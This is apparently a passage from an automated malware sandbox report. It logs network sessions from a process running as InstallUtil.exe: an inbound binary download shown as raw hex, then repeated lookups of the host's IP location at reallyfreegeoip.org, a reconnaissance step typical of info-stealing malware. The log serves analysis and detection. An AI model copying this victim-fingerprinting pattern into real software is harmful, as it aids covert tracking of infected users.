                                                      2024-10-30 06:57:52 UTC16384INData Raw: 79 54 70 a7 cf 4c 0a f4 56 3a 2f 52 e2 6e a5 09 a1 ac e4 27 81 48 8a e4 aa 06 ab 13 47 56 df 98 4c ca 12 9f a9 6f 0c 75 81 11 83 7f 51 e4 e3 64 3e 9f f1 c3 33 9e 54 59 b2 9c 8b e7 be e3 7a 18 6e 4a bd 1c 10 be d2 d2 a5 21 68 25 be e5 a5 04 8c 6b 1a 4d 3e 42 1d f1 9e 38 1d 73 b3 1b 77 8c 79 37 2d 94 b6 e5 74 bf 97 19 01 28 cd 0c 5a a9 4a 5b 9b 20 20 99 91 91 83 35 0d 3f 5b 49 66 e2 81 f9 86 c7 5a 75 24 07 86 cb d0 09 1c d0 a0 2f 78 9a b2 0c 36 b8 57 6e b7 86 d7 d7 a5 c0 10 6a b5 e0 bf 9b 29 72 13 bc ac de f8 28 d5 05 d6 1d 8c 9c 84 02 b0 45 ce 7b 8d ac 23 78 73 2d 3c f4 41 9b e2 40 eb 29 d4 08 c2 cf 2d 87 93 dd 18 77 cf 4e 0d 85 bf 57 b9 c8 41 90 f7 25 b0 03 26 e4 e0 7b 79 64 00 16 4b 35 eb 62 92 51 9a 94 76 1f 85 05 b3 f3 fe 83 0e 27 36 48 d9 8c 48 53 c4
                                                      Data Ascii: yTpLV:/Rn'HGVLouQd>3TYznJ!h%kM>B8swy7-t(ZJ[ 5?[IfZu$/x6Wnj)r(E{#xs-<A@)-wNWA%&{ydK5bQv'6HHS
                                                      2024-10-30 06:57:52 UTC16384INData Raw: 9d ef 14 65 18 2a 30 63 c6 7b 09 c9 58 19 7e 7e 8a e1 65 2f 98 9d d8 5d 20 75 df 60 d4 e2 49 90 79 84 ad 2c 10 1b 41 49 84 f3 cc 70 a0 50 87 4c f5 f4 38 0e c3 19 fd 09 c2 50 0a 13 01 81 68 b0 42 70 3a ac b8 01 33 fe 33 90 57 f3 c4 0a af d9 26 d6 3f 11 fc ca 0f 25 3b be fb ea 8d 08 fe 7b bd db a5 12 96 9f 0c 35 e9 71 86 e6 54 e7 d0 06 af 92 fc c5 c6 c6 ea 78 b5 63 7f e3 5f 39 2f eb 4f 96 0c a2 f8 27 58 3d fc 47 65 05 dd 5a 81 f7 5f 7a 23 6d 41 ce 38 58 e4 9d cf f8 87 c2 ac 1e ea 5e 93 a7 95 c6 bd 09 1e 65 39 df 4c f6 f1 34 74 2b 7f 59 b5 ca 4c 56 b1 d6 15 c2 b9 76 86 10 fc 0d a1 74 1b 9f 58 8c 1f 31 85 0e f8 84 35 f8 5a b2 76 e2 26 f2 80 75 4f 44 6a 70 f5 8a 99 00 ea 9d 0d 80 67 ec 11 99 b8 83 36 85 05 56 fe 60 c0 c9 c3 54 78 15 87 b7 bc c2 98 e1 44 40 5f
                                                      Data Ascii: e*0c{X~~e/] u`Iy,AIpPL8PhBp:33W&?%;{5qTxc_9/O'X=GeZ_z#mA8X^e9L4t+YLVvtX15Zv&uODjpg6V`TxD@_
                                                      2024-10-30 06:57:52 UTC16384INData Raw: b1 47 de c3 88 b7 df 10 77 3e 63 28 e5 05 b9 55 3f 08 b0 9d 30 2a e7 b8 85 72 94 c0 53 be b4 76 91 86 92 b6 91 1d 22 81 ac 30 3b 1e cf 5c 65 19 f5 36 f5 91 56 1d d8 5d 6f d8 64 8a f5 49 19 2b 78 da 0d 09 5d 65 5d 8e 54 07 1c a7 83 aa fc 60 78 d7 fc 37 9c 1f 50 ad a9 6b a2 36 c5 2d 54 96 62 12 f2 75 64 b5 19 70 15 90 85 07 62 9e 58 62 98 ca 5f 74 ee 9d de ad 58 e8 fd ae f7 21 88 23 86 5b 63 19 11 31 bc 52 d3 c1 58 15 5c c4 98 2d 9a a5 d7 83 5e 50 58 57 1d 09 22 62 e5 87 3f a0 db 35 9f f5 2d 94 20 c1 3d d4 c1 60 43 9a 03 f6 7f 61 b9 01 98 de 64 68 1b 2a 4d 00 33 52 9d 9e bf 3b 01 17 b8 62 31 07 5e c4 09 e4 4b 53 ce a2 54 32 99 3b 79 ef 09 01 66 27 f0 88 f9 b4 24 52 18 0c a7 6b fd 91 0e 98 8d 68 68 b7 7b f7 61 84 1a 2c 2f 3a 84 e5 60 91 50 3a 59 e6 46 50 c1
                                                      Data Ascii: Gw>c(U?0*rSv"0;\e6V]odI+x]e]T`x7Pk6-TbudpbXb_tX!#[c1RX\-^PXW"b?5- =`Cadh*M3R;b1^KST2;yf'$Rkhh{a,/:`P:YFP


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      10192.168.2.549756188.114.96.34436204C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-30 06:57:56 UTC87OUTGET /xml/173.254.250.78 HTTP/1.1
                                                      Host: reallyfreegeoip.org
                                                      Connection: Keep-Alive
                                                      2024-10-30 06:57:56 UTC891INHTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:57:56 GMT
                                                      Content-Type: text/xml
                                                      Content-Length: 359
                                                      Connection: close
                                                      apigw-requestid: AcLvmhW3vHcESEw=
                                                      Cache-Control: max-age=31536000
                                                      CF-Cache-Status: HIT
                                                      Age: 19499
                                                      Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                      Accept-Ranges: bytes
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XTY2O3WF6gjVXst7BbxOkwiqCAuyYa1W4pPY1n5U%2BRGiwL8%2F6pmkfjBLijmY2RcIGPm%2FV0hY2xkOkwKI%2FG59uQYeTGyQyZfx34n%2FFjeT1YAdbJ5l6PPqwiNjz2POP%2FaS5DZZ7PKL"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8da983991bfc316b-DFW
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1313&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2220858&cwnd=251&unsent_bytes=0&cid=52f392fdfd5178f8&ts=206&x=0"
                                                      2024-10-30 06:57:56 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                      Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      11192.168.2.549765188.114.96.34436204C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-30 06:57:57 UTC63OUTGET /xml/173.254.250.78 HTTP/1.1
                                                      Host: reallyfreegeoip.org
                                                      2024-10-30 06:57:57 UTC893INHTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:57:57 GMT
                                                      Content-Type: text/xml
                                                      Content-Length: 359
                                                      Connection: close
                                                      apigw-requestid: AcLvmhW3vHcESEw=
                                                      Cache-Control: max-age=31536000
                                                      CF-Cache-Status: HIT
                                                      Age: 19500
                                                      Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                      Accept-Ranges: bytes
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oCaHTYfBNOK507rWMkbj3pvX9EVH2pIFttgPZN0SFelcfyB3%2F%2Fc3Rc1%2BwDMlAMHqq8L5QvUaR7wDnpqcrMkVFLFjNzt4jQUEUIwg%2Fo9C1U%2FT8dNq7kbe%2FsD7%2FV6z2h4jEehsZ0OF"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8da9839ece65e53e-DFW
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1149&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2381578&cwnd=251&unsent_bytes=0&cid=c970beb5e3d5e547&ts=145&x=0"
                                                      2024-10-30 06:57:57 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                      Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      12192.168.2.549773188.114.96.34436204C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-30 06:57:58 UTC87OUTGET /xml/173.254.250.78 HTTP/1.1
                                                      Host: reallyfreegeoip.org
                                                      Connection: Keep-Alive
                                                      2024-10-30 06:57:59 UTC887INHTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:57:59 GMT
                                                      Content-Type: text/xml
                                                      Content-Length: 359
                                                      Connection: close
                                                      apigw-requestid: AcLvmhW3vHcESEw=
                                                      Cache-Control: max-age=31536000
                                                      CF-Cache-Status: HIT
                                                      Age: 19502
                                                      Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                      Accept-Ranges: bytes
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q2N%2FXDN0pSZw7T3zlwbeItBfm4BSzYuJK3jkAqXpkm%2FFsIMprR02BRTKT3ZynP1xReyKyO0l9TpSsR%2FPHzzKjV2DQB8OkbPER2mRbr6TDwAYq3z2xsL05SA6WeZIGVNpyjpZ%2BbGj"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8da983a7f9e33464-DFW
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1079&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2599640&cwnd=251&unsent_bytes=0&cid=3f086ae84aa95e66&ts=156&x=0"
                                                      2024-10-30 06:57:59 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                      Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      13192.168.2.549785188.114.96.34436204C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-30 06:58:00 UTC63OUTGET /xml/173.254.250.78 HTTP/1.1
                                                      Host: reallyfreegeoip.org
                                                      2024-10-30 06:58:00 UTC887INHTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:58:00 GMT
                                                      Content-Type: text/xml
                                                      Content-Length: 359
                                                      Connection: close
                                                      apigw-requestid: AcLvmhW3vHcESEw=
                                                      Cache-Control: max-age=31536000
                                                      CF-Cache-Status: HIT
                                                      Age: 19503
                                                      Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                      Accept-Ranges: bytes
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RM0Wyyb97mxKwU9I0PR2Y1ZKZ9wLLEv9W0sN%2FfZb%2B4Mde9yHU9X8IdIV97d68nWU4yEHLdO%2FhLCSHdBLVcg127Dw%2BaKFR8PepNQnI6Wbzk1BMUfLHaz2oiAqpLth7DUHBfl6iwqh"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8da983b0e8616b91-DFW
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1028&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2714151&cwnd=251&unsent_bytes=0&cid=1c6381fa952b165d&ts=148&x=0"
                                                      2024-10-30 06:58:00 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                      Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      14192.168.2.549792188.114.96.34436204C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-30 06:58:01 UTC87OUTGET /xml/173.254.250.78 HTTP/1.1
                                                      Host: reallyfreegeoip.org
                                                      Connection: Keep-Alive
                                                      2024-10-30 06:58:01 UTC887INHTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:58:01 GMT
                                                      Content-Type: text/xml
                                                      Content-Length: 359
                                                      Connection: close
                                                      apigw-requestid: AcLvmhW3vHcESEw=
                                                      Cache-Control: max-age=31536000
                                                      CF-Cache-Status: HIT
                                                      Age: 19504
                                                      Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                      Accept-Ranges: bytes
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FziQasjnh%2F4HbrE%2BQhBmRpJ6b9fYw16vleWSRIufnqvhrTE9%2FieLpwZiN99E0yklWfbtbstjTznr5MYNmU%2FKy4MhBFAzOVBinZkD7BeB1dQznQAA1ncG2FgoOkP9BvTZ0flLGRWb"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8da983ba0daa4864-DFW
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1640&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=1776687&cwnd=249&unsent_bytes=0&cid=b24fce9a184b95fb&ts=150&x=0"
                                                      2024-10-30 06:58:01 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                      Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      15192.168.2.549804188.114.96.34436204C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-30 06:58:03 UTC63OUTGET /xml/173.254.250.78 HTTP/1.1
                                                      Host: reallyfreegeoip.org
                                                      2024-10-30 06:58:03 UTC887INHTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:58:03 GMT
                                                      Content-Type: text/xml
                                                      Content-Length: 359
                                                      Connection: close
                                                      apigw-requestid: AcLvmhW3vHcESEw=
                                                      Cache-Control: max-age=31536000
                                                      CF-Cache-Status: HIT
                                                      Age: 19506
                                                      Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                      Accept-Ranges: bytes
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=meetUZSUXwY%2FxmcA0EA%2Fa6SMsvHb3EMt3x1EDApvChFifWLqXyS3NURg4HVzjNoHNIasZUN5iQbVSIxeHlUiDwy8mLLJC%2BGaP4oe0%2BbdQRYmKewRVmiG4GvgA0ZhAr7lhm6zGjra"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8da983c459666be0-DFW
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1802&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=1531464&cwnd=251&unsent_bytes=0&cid=14527cd152017c5d&ts=148&x=0"
                                                      2024-10-30 06:58:03 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                      Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      16192.168.2.549816188.114.96.34436204C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-30 06:58:04 UTC87OUTGET /xml/173.254.250.78 HTTP/1.1
                                                      Host: reallyfreegeoip.org
                                                      Connection: Keep-Alive
                                                      2024-10-30 06:58:05 UTC887INHTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:58:05 GMT
                                                      Content-Type: text/xml
                                                      Content-Length: 359
                                                      Connection: close
                                                      apigw-requestid: AcLvmhW3vHcESEw=
                                                      Cache-Control: max-age=31536000
                                                      CF-Cache-Status: HIT
                                                      Age: 19508
                                                      Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                      Accept-Ranges: bytes
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cMMN%2FWYsLdlSfBlIDm5fjG0c2qRNAkzAFdanWubm2fzLbYUhFLoD83oJhMswqvuKeqhEFyK%2B%2B%2B7k6GlltjIEOEcDmlNy3UYWAXXzhUSh9XdAPTPGiuGQ1uDlGg5DIW64xy1Z6TGq"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8da983cd8f32466c-DFW
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1219&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2490111&cwnd=251&unsent_bytes=0&cid=87df8b6acb37132e&ts=159&x=0"
                                                      2024-10-30 06:58:05 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                      Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      17192.168.2.549825188.114.96.34436204C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-30 06:58:07 UTC87OUTGET /xml/173.254.250.78 HTTP/1.1
                                                      Host: reallyfreegeoip.org
                                                      Connection: Keep-Alive
                                                      2024-10-30 06:58:07 UTC894INHTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:58:07 GMT
                                                      Content-Type: text/xml
                                                      Content-Length: 359
                                                      Connection: close
                                                      apigw-requestid: AcLvmhW3vHcESEw=
                                                      Cache-Control: max-age=31536000
                                                      CF-Cache-Status: HIT
                                                      Age: 19510
                                                      Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                      Accept-Ranges: bytes
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s8lm2JLfdesCtV6%2BOuUqVt%2B0EJL1Jsl%2BFuOZ%2Bs%2BsaGKPTQycGxMzWDYqt9%2BZH%2FlaEOWjJZEXKYy4XElNoSoKLAi47Pq10Vvrydd9kgorI4vx8V6%2FP52s7r072AjNbzSQ7kmh0yzz"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8da983db08782cd7-DFW
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1175&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2407315&cwnd=32&unsent_bytes=0&cid=55f3e6355c277d07&ts=697&x=0"
